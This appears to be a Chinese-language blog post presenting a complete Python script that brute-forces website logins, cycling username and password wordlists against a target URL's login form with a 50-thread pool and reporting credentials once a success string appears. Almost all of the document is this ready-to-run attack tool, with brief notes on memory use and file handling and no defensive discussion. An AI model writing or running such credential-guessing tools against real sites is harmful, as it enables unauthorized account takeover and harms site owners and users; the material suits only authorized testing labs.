利用Python线程池模块实现网站登录的破解
本代码的注意事项:
1. 读取字典尤其是大字典文件,用readline而不是readlines方法读取每一行,这样可以节省内存空间
2. 本代码有两层循环,外层为用户名字典的循环,内层为密码字典的循环,特别需要注意,内层循环在readline到文件解围后,需要重新open,才能继续读取下一个用户名对应的所有密码
3. 用了线程池而不是多线程模块,这样用户可以指定线程数量。
1 import requests 2 import sys 3 import optparse 4 from concurrent.futures import ThreadPoolExecutor 5 import os 6 import queue 7 8 class LoginBruteForce: 9 def __init__(self) -> None: 10 self.url = self.url_prefix_formatter(self.get_params()[0]) 11 self.userlist = self.get_params()[1] 12 self.passlist = self.get_params()[2] 13 self.headers = { 14 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0' 15 } 16 self.q = queue.Queue() 17 self.threads = 50 18 19 def get_params(self): 20 parser = optparse.OptionParser('Usage: < Program > -u website url -L username wordlist -p password wordlist') 21 parser.add_option('-u', '--url', dest='url', type='string', help='Specify website url to brute force') 22 parser.add_option('-L', '--userlist', dest='userlist', type='string', help='Specify username wordlist ') 23 parser.add_option('-p', '--passlist', dest='passlist', type='string', help='Specify password wordlist') 24 options, args = parser.parse_args() 25 if options.url is None or options.userlist is None or options.passlist is None: 26 print(parser.usage) 27 sys.exit(0) 28 if not os.path.exists(options.userlist) or not os.path.exists(options.passlist): 29 print("username wordlist or password list does not exist") 30 sys.exit(0) 31 32 33 return options.url, options.userlist, options.passlist 34 35 36 def url_prefix_formatter(self, url): 37 if url.startswith('http://'): 38 return url 39 elif url.startswith('https://'): 40 return url 41 else: 42 return 'http://' + url 43 44 45 def login(self, username, password): 46 print("Attempting username: %s\t password: %s" % (username, password)) 47 post_data = { 48 'username': username, 49 'password': password, 50 'Login': 'Login' 51 } 52 try: 53 response = requests.post(url=self.url, headers=self.headers, data=post_data) 54 print('status code', response.status_code) 55 if response.status_code == 200: 56 if 'You have logged in as' in response.text: 57 print("Found!", username, password) 58 self.q.put((username, password)) 59 except: 60 pass 61 62 def run(self): 63 64 with ThreadPoolExecutor(self.threads) as t: 65 uf = open(self.userlist, 'r') 66 67 while True: 68 user_line = uf.readline() 69 if len(user_line)==0: 70 break 71 72 pf = open(self.passlist, 'r') 73 74 while True: 75 pass_line = pf.readline() 76 if len(pass_line)==0: 77 break 78 if self.q.empty(): 79 80 t.submit(self.login, username=user_line.strip(), password=pass_line.strip()) 81 82 83 uf.close() 84 pf.close() 85 86 if self.q.empty(): 87 print("Failed to attack") 88 else: 89 print(self.q.get()) 90 91 92 93 if __name__ == '__main__': 94 loginbruter = LoginBruteForce() 95 loginbruter.run() 96 97 98 99 100 101
STRIVE FOR PROGRESS,NOT FOR PERFECTION